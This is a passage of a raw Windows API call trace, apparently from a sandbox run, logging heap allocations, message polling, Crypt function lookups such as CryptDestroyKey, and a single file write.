(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0225.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0225.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0225.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0225.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0225.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0225.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0225.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0225.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0225.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14998) returned 0x2ea9670 [0225.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0225.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0225.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0225.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0225.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0225.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0225.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0225.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0225.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0225.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0225.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0225.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14998) returned 0x2ebe010 [0225.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea9670 | out: hHeap=0x970000) returned 1 [0225.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0225.166] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0225.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0225.166] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0225.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0225.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0225.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0225.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.167] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0225.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0225.167] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0225.167] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0225.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0225.167] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0225.167] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0225.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0225.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0225.167] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0225.167] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0225.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0225.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0225.168] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0225.168] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0225.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0225.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0225.168] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.168] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0225.168] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0225.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0225.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0225.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0225.177] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0225.178] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.178] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0225.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0225.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0225.182] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0x14998, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0x14998, lpOverlapped=0x0) returned 1 [0225.185] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0225.185] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0225.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0225.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0225.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0225.185] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0225.185] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0225.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0225.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0225.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0225.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0225.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0225.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0225.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0225.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0225.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0225.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0225.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0225.185] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0225.186] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0225.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0225.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0225.186] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0225.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0225.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0225.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0225.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0225.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0225.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0225.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51220, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0225.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0225.186] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0225.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0225.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0225.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0225.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0225.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0225.187] CryptDestroyKey (hKey=0xa875d0) returned 1 [0225.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0225.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0225.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0225.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0225.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0225.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0225.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0225.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0225.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0225.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0225.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0225.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0225.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0225.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0225.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0225.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0225.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0225.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0225.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0225.214] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0225.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0225.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0225.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0225.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0225.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0225.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0225.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0225.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0225.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0225.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0225.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0225.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0225.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0225.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0225.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0225.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0225.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0225.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0225.215] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0225.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0225.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0225.215] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0225.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0225.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0225.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0225.215] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0225.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0225.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0225.215] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0225.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0225.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0225.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0225.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0225.215] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0225.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0225.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0225.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0225.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0225.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0225.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0225.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0225.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0225.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0225.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0225.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0225.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0225.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0225.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0225.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0225.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0225.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0225.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0225.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0225.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0225.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0225.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0225.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0225.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0225.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0225.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0225.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0225.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0225.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0225.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0225.217] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0225.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0225.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0225.217] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0225.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0225.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0225.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0225.217] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0225.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0225.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0225.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 